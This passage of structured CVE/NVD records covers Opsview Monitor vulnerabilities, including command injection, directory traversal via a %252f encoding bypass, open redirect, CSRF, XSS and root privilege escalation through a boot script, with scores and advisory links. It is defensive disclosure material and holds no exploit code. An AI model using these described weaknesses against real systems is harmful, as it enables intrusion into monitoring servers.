"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2018-16146
Vulnerability from fkie_nvd - Published: 2018-09-05 21:29 - Updated: 2024-11-21 03:52| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://knowledge.opsview.com/v5.4/docs/whats-new | Vendor Advisory | |
| cve@mitre.org | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://knowledge.opsview.com/v5.4/docs/whats-new | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://seclists.org/fulldisclosure/2018/Sep/3 | Exploit, Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60700697-09A0-4FBB-A747-2411A7A022BC",
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account."
},
{
"lang": "es",
"value": "La consola de gesti\u00f3n web de Opsview Monitor en versiones 5.4.x anteriores a la 5.4.2 proporciona funcionalidades a las que puede acceder un administrador autenticado para probar notificaciones que se desencadenan en ciertos eventos configurables. El par\u00e1metro value no est\u00e1 debidamente saneado, lo que conduce a una inyecci\u00f3n de comandos arbitrarios con los privilegios de la cuenta de usuario nagios."
}
],
"id": "CVE-2018-16146",
"lastModified": "2024-11-21T03:52:09.833",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-05T21:29:02.797",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2016-10367
Vulnerability from fkie_nvd - Published: 2017-05-03 10:59 - Updated: 2025-04-20 01:37| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "FD8E5B51-BCBA-45F0-80AC-F261799D85A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:4.6.4:*:*:*:pro:*:*:*",
"matchCriteriaId": "7EB123AC-31E7-4B3F-98E0-D1DD7F3B1ADE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.0.2:*:*:*:pro:*:*:*",
"matchCriteriaId": "7E2B55E2-5943-412D-ACBD-1D100234FF55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.1.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "A5E29CDA-78E1-418C-9548-F3294FF2DF1A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
},
{
"lang": "es",
"value": "En Opsview Monitor Pro (versiones anteriores a la 5.1.0.162300841, anteriores a la 5.0.2.27475, anteriores a la 4.6.4.162391051 y 4.5.x sin el parche de seguridad de 2016), una vulnerabilidad de salto de directorio no autenticado puede explotarse a trav\u00e9s de una petici\u00f3n HTTP GET especialmente manipulada, eludiendo la codificaci\u00f3n URL de / utilizando %252f."
}
],
"id": "CVE-2016-10367",
"lastModified": "2025-04-20T01:37:25.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-05-03T10:59:00.240",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2016-10368
Vulnerability from fkie_nvd - Published: 2017-05-03 10:59 - Updated: 2025-04-20 01:37| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341 | Exploit, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "FD8E5B51-BCBA-45F0-80AC-F261799D85A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:4.6.4:*:*:*:pro:*:*:*",
"matchCriteriaId": "7EB123AC-31E7-4B3F-98E0-D1DD7F3B1ADE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.0.2:*:*:*:pro:*:*:*",
"matchCriteriaId": "7E2B55E2-5943-412D-ACBD-1D100234FF55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:opsview:opsview:5.1.0:*:*:*:pro:*:*:*",
"matchCriteriaId": "A5E29CDA-78E1-418C-9548-F3294FF2DF1A",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the /login URI."
},
{
"lang": "es",
"value": "Vulnerabilidad de redirecci\u00f3n abierta en Opsview Monitor Pro (anteriores a 5.1.0.162300841, 5.0.2.27475, 4.6.4.162391051 y 4.5.x sin un parche concreto de seguridad de 2016) permite a los atacantes remotos redirigir a los usuarios a sitios web arbitrarios y realizar el phishing a trav\u00e9s del par\u00e1metro back a la URI /login."
}
],
"id": "CVE-2016-10368",
"lastModified": "2025-04-20T01:37:25.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-05-03T10:59:00.270",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-601"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2013-3935 (GCVE-0-2013-3935)
Vulnerability from cvelistv5 – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:22- Cross-Site Request Forgery
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Opsview | Opsview |
Affected:
before 4.4.1
|
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:22:01.472Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Request Forgery ",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:52",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3935",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4.1 and Opsview Core before 20130522 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Request Forgery "
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3935",
"datePublished": "2020-01-02T14:31:52",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:22:01.472Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2013-3936 (GCVE-0-2013-3936)
Vulnerability from cvelistv5 – Published: 2020-01-02 14:31 – Updated: 2024-08-06 16:30- Cross-Site Scripting
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Opsview | Opsview |
Affected:
before 4.4.1
|
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T16:30:48.701Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Opsview",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 4.4.1"
}
]
},
{
"product": "Opsview Core",
"vendor": "Opsview",
"versions": [
{
"status": "affected",
"version": "before 20130522"
}
]
}
],
"datePublic": "2013-10-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Cross-Site Scripting",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-02T14:31:49",
"orgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"shortName": "flexera"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "PSIRT-CNA@flexerasoftware.com",
"ID": "CVE-2013-3936",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Opsview",
"version": {
"version_data": [
{
"version_value": "before 4.4.1"
}
]
}
},
{
"product_name": "Opsview Core",
"version": {
"version_data": [
{
"version_value": "before 20130522"
}
]
}
}
]
},
"vendor_name": "Opsview"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in Opsview before 4.4.1 and Opsview Core before 20130522 allow remote attackers to inject arbitrary web script or HTML."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Cross-Site Scripting"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes"
},
{
"name": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822",
"refsource": "MISC",
"url": "http://docs.opsview.com/doku.php?id=opsview-core:changes#opsview_core_20130822"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "44d08088-2bea-4760-83a6-1e9be26b15ab",
"assignerShortName": "flexera",
"cveId": "CVE-2013-3936",
"datePublished": "2020-01-02T14:31:49",
"dateReserved": "2013-06-04T00:00:00",
"dateUpdated": "2024-08-06T16:30:48.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16145 (GCVE-0-2018-16145)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:38.184Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16145",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The /etc/init.d/opsview-reporting-module script that runs at boot time in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 invokes a file that can be edited by the nagios user, and would allow attackers to elevate their privileges to root after a system restart, hence obtaining full control of the appliance."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16145",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.184Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16147 (GCVE-0-2018-16147)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.631Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The data parameter of the /settings/api/router endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16147",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:37.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-16146 (GCVE-0-2018-16146)
Vulnerability from cvelistv5 – Published: 2018-09-05 21:00 – Updated: 2024-08-05 10:17- n/a
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T10:17:37.835Z",
